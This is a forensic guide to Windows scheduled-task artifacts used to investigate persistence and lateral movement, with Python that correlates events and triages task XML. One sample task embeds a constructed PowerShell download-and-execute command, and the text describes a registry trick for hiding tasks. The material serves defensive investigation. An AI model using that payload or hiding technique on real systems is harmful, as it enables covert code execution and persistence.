Scheduled Tasks

Threat actors use scheduled tasks for persistence, for running code as SYSTEM, and for lateral movement (registering a task on a remote host with schtasks /s or the legacy at command). The split below follows the remote case: the source system is the host the task was created from, the destination system is the host where it was registered and runs. For a locally created task both sets of artifacts are on the same machine. Key artifacts associated with the creation, execution, and management of scheduled tasks in Windows include:

Source System Artifacts:

  • Event Log:

    • Event ID 4648: A logon was attempted using explicit credentials. Logged on the source when schtasks /s is run with /u and /p; TargetServerName names the destination host and ProcessName shows schtasks.exe.

    • Scheduled Task Events (Security log; only generated when the Audit Other Object Access Events subcategory is enabled, which it is not by default):

      • 4698 (creation)

      • 4702 (update)

      • 4699 (deletion)

      • 4700/4701 (enabled/disabled).

  • Registry:

    • ShimCache: SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache (executables the application-compatibility subsystem has seen; the in-memory cache is only written to the hive at shutdown or reboot, so a live system can lag behind).

    • BAM/DAM: SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}; on Windows 10 1809 and later the key is SYSTEM\CurrentControlSet\Services\bam\State\UserSettings\{SID}. Each value is the full path of an executable run by that user, with the last-execution time stored as a FILETIME.

    • Amcache.hve (C:\Windows\AppCompat\Programs\Amcache.hve): inventories executables present on the system with their SHA-1 hashes, including schtasks.exe and at.exe. An entry shows the file existed and was inventoried; on its own it is not proof that it ran.

  • Prefetch (workstation SKUs; disabled by default on Windows Server):

    • C:\Windows\Prefetch\AT.EXE-{hash}.pf (at.exe has been deprecated since Windows 8, so any recent use is notable)

    • C:\Windows\Prefetch\SCHTASKS.EXE-{hash}.pf

Destination System Artifacts:

  • Event Log:

    • Event ID 4624: Successful logon. A remotely created task shows Logon Type 3 (network) with the source host in WorkstationName and IpAddress; the Logon ID ties this record to the 4672 and the task events that follow it.

    • Event ID 4672: Special privileges assigned to new logon.

    • Event ID 4776: The computer attempted to validate the credentials for an account. Generated for NTLM only, on whichever host validated the credentials: the destination itself for a local account, the domain controller for a domain account. Kerberos logons leave 4768/4769 on the domain controller instead.

    • Scheduled Task Events (Security log, subject to the same audit-subcategory requirement as on the source):

      • 4698 (creation)

      • 4702 (update)

      • 4699 (deletion)

      • 4700/4701 (enabled/disabled).

  • Registry:

    • TaskCache (SOFTWARE hive), Tree and Tasks:

      • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\<task path>: one key per task holding its Id (GUID) and SD (security descriptor) values.

      • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{GUID}: Path, Hash, Author, Date, the serialised Triggers and Actions, and DynamicInfo (creation and last-run timestamps).

        • Store details of scheduled tasks. The Actions value carries the command line as UTF-16LE, so a task's action can be recovered from the hive after its XML file is deleted. A task whose SD value has been removed from its Tree key is not shown by Task Scheduler or schtasks /query, a documented hiding technique, so compare the Tree entries against the XML files rather than trusting the task list.

  • File System:

    • Job Files: C:\Windows\Tasks (legacy .job files written by at.exe and the Task Scheduler 1.0 API)

    • XML Task Files: C:\Windows\System32\Tasks (one UTF-16 XML file per task, named after the task with no extension, in a folder tree that mirrors the task path)
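The two artifact lists above describe one remote task registration from both ends. The Python below is an added example, not code from the original page, that stitches those records together: the 4648 on the source, the type-3 4624 with its 4672 and 4776 on the destination, and every task event that shares the destination logon ID. The host names, users, IP address, timestamps, logon IDs and task name are constructed; real input would be EVTX exports of both hosts reduced to the EventData fields used here.

```python
"""
Correlate source-host and destination-host Security events around a remote
scheduled-task registration. Added example; all records below are constructed.
"""
from datetime import datetime, timedelta

TASK_EVENT_IDS = {4698: "created", 4699: "deleted", 4700: "enabled",
                  4701: "disabled", 4702: "updated"}

# Constructed: WS01 is the source, SRV02 the destination. Keys mirror the
# EventData field names of each event ID; only the fields used here are kept.
WS01_EVENTS = [
    {"ts": "2024-03-04T10:15:02", "EventID": 4648, "SubjectUserName": "alice",
     "TargetUserName": "svc_backup", "TargetServerName": "SRV02",
     "ProcessName": r"C:\Windows\System32\schtasks.exe"},
    {"ts": "2024-03-04T10:40:11", "EventID": 4648, "SubjectUserName": "alice",  # unrelated noise
     "TargetUserName": "alice", "TargetServerName": "localhost",
     "ProcessName": r"C:\Windows\System32\mmc.exe"},
]
SRV02_EVENTS = [
    {"ts": "2024-03-04T10:15:03", "EventID": 4776, "TargetUserName": "svc_backup",
     "Workstation": "WS01", "Status": "0x0"},
    {"ts": "2024-03-04T10:15:03", "EventID": 4624, "TargetUserName": "svc_backup",
     "LogonType": "3", "IpAddress": "10.0.0.5", "WorkstationName": "WS01",
     "TargetLogonId": "0x3E7A21"},
    {"ts": "2024-03-04T10:15:03", "EventID": 4672, "SubjectUserName": "svc_backup",
     "SubjectLogonId": "0x3E7A21"},
    {"ts": "2024-03-04T10:15:05", "EventID": 4698, "SubjectUserName": "svc_backup",
     "SubjectLogonId": "0x3E7A21", "TaskName": r"\Microsoft\Windows\Updater"},
    {"ts": "2024-03-04T11:02:40", "EventID": 4624, "TargetUserName": "bob",  # unrelated noise
     "LogonType": "2", "IpAddress": "-", "WorkstationName": "SRV02",
     "TargetLogonId": "0x41C200"},
]


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def correlate(source_events, dest_events, dest_host, window=timedelta(seconds=30)):
    """For every 4648 on the source aimed at dest_host, find the network logon
    (4624, type 3) it produced on the destination within `window`, then gather
    every destination event carrying that logon ID. One chain per matched logon."""
    chains = []
    for src in (e for e in source_events if e["EventID"] == 4648):
        if src["TargetServerName"].lower() != dest_host.lower():
            continue
        t0 = _ts(src)
        for logon in dest_events:
            if (logon["EventID"] != 4624 or logon["LogonType"] != "3"
                    or logon["TargetUserName"].lower() != src["TargetUserName"].lower()
                    or not t0 <= _ts(logon) <= t0 + window):
                continue
            lid = logon["TargetLogonId"].lower()
            session = [e for e in dest_events if e.get("SubjectLogonId", "").lower() == lid]
            # 4776 has no logon ID, so it is matched by account and time only;
            # it is absent altogether when Kerberos was used.
            ntlm = any(e["EventID"] == 4776
                       and e["TargetUserName"].lower() == src["TargetUserName"].lower()
                       and abs(_ts(e) - _ts(logon)) <= window for e in dest_events)
            chains.append({
                "source_user": src["SubjectUserName"],
                "source_process": src["ProcessName"],
                "account_used": src["TargetUserName"],
                "src_ip": logon["IpAddress"],
                "logon_id": lid,
                "ntlm_validated": ntlm,
                "privileged": any(e["EventID"] == 4672 for e in session),
                "task_events": [{"ts": e["ts"], "action": TASK_EVENT_IDS[e["EventID"]],
                                 "task": e["TaskName"]}
                                for e in session if e["EventID"] in TASK_EVENT_IDS],
            })
    return chains


if __name__ == "__main__":
    for chain in correlate(WS01_EVENTS, SRV02_EVENTS, "SRV02"):
        print(chain)
```

The logon ID is the pivot that makes the destination side trustworthy: 4672 and 4698 carry it as SubjectLogonId, the 4624 that created it as TargetLogonId. The 4776 flag is informational only, because it is NTLM-specific and, for domain accounts, lands on the domain controller rather than the destination.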

Overview

Scheduled tasks are part of normal Windows operation and administration, which is exactly what makes them attractive for persistence: a malicious task sits among many legitimate ones. Each artifact above answers a different question:

  • Event IDs 4698, 4702, 4699, 4700 and 4701 record who created, updated, deleted, enabled or disabled a task and when; 4698 and 4702 also carry the full task XML in their TaskContent / TaskContentNew fields.

  • Registry keys under TaskCache hold task configuration and metadata, including creation and last-run times, and survive deletion of the task's XML file.

  • Prefetch files for schtasks.exe and at.exe record that the binary ran, with the last run time and, on Windows 8 and later, up to the seven previous run times, which helps anchor the timeline.

  • File paths like C:\Windows\System32\Tasks and C:\Windows\Tasks contain the task definitions themselves, potentially including malicious tasks; their creation timestamps date the registration.

Analyzing The Artifact

  1. Examine Scheduled Tasks: Use the Task Scheduler GUI (taskschd.msc), schtasks /query /fo LIST /v or PowerShell's Get-ScheduledTask to list and review tasks. Pay attention to tasks with unusual triggers (logon, boot, very short repetition intervals) or actions (scripting hosts, binaries in user-writable paths, encoded command lines). All three views come from the Task Scheduler service and will not show a task hidden by tampering with its registry entry, so they complement rather than replace the registry and file-system checks below.

  2. Event Log Analysis: Investigate the Security log (4698 to 4702) and the Microsoft-Windows-TaskScheduler/Operational log (106 task registered, 140 task updated, 141 task deleted, 100/102 task started/completed, 200/201 action started/completed, 129 created task process) for creation, modification, and execution of tasks. The Operational log is disabled by default on current Windows versions, so confirm it was enabled before treating its absence of events as meaningful. Correlate these events with the logon events and any other suspicious activity in the same time window.

  3. Registry Examination: Navigate to SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache and analyze the Tree and Tasks keys for task definitions and metadata. Tools like Registry Explorer can be invaluable; its TaskCache plugin decodes the binary Actions, Triggers and DynamicInfo values into readable form.

  4. Prefetch Analysis: Review prefetch files for execution patterns of schtasks.exe, at.exe, and of whatever binary the task launches. A prefetch file for that binary whose run times line up with the task's trigger confirms the task actually fired, not just that it was registered.

  5. File System Scrutiny: Inspect C:\Windows\System32\Tasks and C:\Windows\Tasks for task files, especially those with recent creation timestamps, names that mimic Microsoft tasks, or links to other indicators of compromise. Compare the files against the TaskCache\Tree keys: a task present in one place and missing from the other needs an explanation.
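Steps 2 and 5 both end at the same object, the task definition XML: it is the file under C:\Windows\System32\Tasks and it is embedded verbatim in the TaskContent field of event 4698. The Python below is an added example, not code from the original page, that parses both forms and reports the properties an analyst checks first: author, principal and run level, hidden flag, trigger types, the command and its arguments, and a decoded -EncodedCommand payload. The task, the 4698 record, the account names and the payload are all constructed.

```python
"""
Parse a scheduled-task definition from either place it lives: the UTF-16 XML
file under System32\\Tasks or the TaskContent field of Security event 4698.
Added example; the task, event and payload below are constructed.
"""
import base64
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
EVT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
USER_WRITABLE = re.compile(r"\\(Users|Temp|ProgramData|AppData|Public)\\", re.I)
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "rundll32.exe",
           "regsvr32.exe", "wscript.exe", "cscript.exe", "certutil.exe", "bitsadmin.exe"}
# powershell.exe accepts -e, -ec and any prefix of -EncodedCommand starting with -en
ENC_ARG = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.I)

# Constructed: a downloader one-liner encoded as -EncodedCommand expects (UTF-16LE, base64)
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()

SAMPLE_TASK = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>CORP\\svc_backup</Author><Date>2024-03-04T10:15:05</Date></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author"><Exec>
    <Command>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe</Command>
    <Arguments>-NoP -W Hidden -enc __ENC__</Arguments>
  </Exec></Actions>
</Task>""".replace("__ENC__", ENCODED)

# Constructed: the 4698 record as Event Viewer's XML view renders it; the task XML rides inside, escaped
SAMPLE_4698 = f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4698</EventID><Computer>SRV02.corp.local</Computer></System>
  <EventData>
    <Data Name="SubjectUserName">svc_backup</Data>
    <Data Name="SubjectLogonId">0x3E7A21</Data>
    <Data Name="TaskName">\\Microsoft\\Windows\\Updater</Data>
    <Data Name="TaskContent">{escape(SAMPLE_TASK)}</Data>
  </EventData>
</Event>"""


def _text(node, path):
    el = node.find(path, TASK_NS)
    return (el.text or "").strip() if el is not None else ""


def parse_task(data):
    """Analyst-relevant fields of a task definition plus the indicators it trips.
    Accepts bytes (file from System32\\Tasks, UTF-16 with BOM) or str (TaskContent)."""
    if isinstance(data, bytes):
        data = data.decode("utf-16" if data[:2] in (b"\xff\xfe", b"\xfe\xff") else "utf-8")
    # The declaration claims UTF-16; drop it because expat is being handed a str.
    root = ET.fromstring(re.sub(r"^\s*<\?xml[^>]*\?>", "", data))
    trig = root.find("t:Triggers", TASK_NS)
    execs = root.findall("t:Actions/t:Exec", TASK_NS)
    info = {
        "author": _text(root, "t:RegistrationInfo/t:Author"),
        "user_id": _text(root, "t:Principals/t:Principal/t:UserId"),
        "run_level": _text(root, "t:Principals/t:Principal/t:RunLevel"),
        "hidden": _text(root, "t:Settings/t:Hidden").lower() == "true",
        "triggers": [] if trig is None else [t.tag.rsplit("}", 1)[-1] for t in trig],
        "command": _text(execs[0], "t:Command") if execs else "",
        "arguments": _text(execs[0], "t:Arguments") if execs else "",
        "decoded_command": "",
    }
    m = ENC_ARG.search(info["arguments"])
    if m:
        try:  # a malformed blob (e.g. "-e Bypass") must not abort the triage
            info["decoded_command"] = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
        except ValueError:  # covers binascii.Error and UnicodeDecodeError
            pass
    flags = []
    if info["hidden"]:
        flags.append("hidden task")
    if info["user_id"] == "S-1-5-18" or info["run_level"] == "HighestAvailable":
        flags.append("runs as SYSTEM or elevated")
    if USER_WRITABLE.search(info["command"]):
        flags.append("binary in user-writable path")
    if info["command"].rsplit("\\", 1)[-1].lower() in LOLBINS:
        flags.append("living-off-the-land binary")
    if info["decoded_command"]:
        flags.append("encoded PowerShell command")
    if any(t in ("LogonTrigger", "BootTrigger") for t in info["triggers"]):
        flags.append("fires at logon/boot")
    info["indicators"] = flags
    return info


def parse_4698(event_xml):
    """Who registered which task on which host, with the embedded task body parsed."""
    root = ET.fromstring(event_xml)
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", EVT_NS)}
    return {
        "computer": root.findtext("e:System/e:Computer", "", EVT_NS),
        "subject": data.get("SubjectUserName", ""),
        "logon_id": data.get("SubjectLogonId", ""),
        "task_name": data.get("TaskName", ""),
        "task": parse_task(data.get("TaskContent", "")),
    }
```

Run it against a real file with parse_task(open(path, "rb").read()), or against an exported 4698 record with parse_4698. The indicator names and thresholds are this example's own choices; the namespaces, element names and the UTF-16LE base64 convention of -EncodedCommand are Windows' own.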

Tools for Analysis

  • Task Scheduler and Command Line Utilities: For reviewing and managing scheduled tasks.

  • Windows Event Viewer: For detailed logs related to task creation, execution, and deletion.

  • Registry Tools (Registry Explorer, RECmd): For deep dives into the registry entries associated with tasks.

  • Forensic Analysis Tools (Autopsy, X-Ways Forensics): For comprehensive analysis of file systems, prefetch files, and registry keys.

  • PowerShell Scripts: Get-ScheduledTask and Export-ScheduledTask on a live host, or custom scripts over exported logs and hives, can automate the extraction and analysis of scheduled task artifacts.
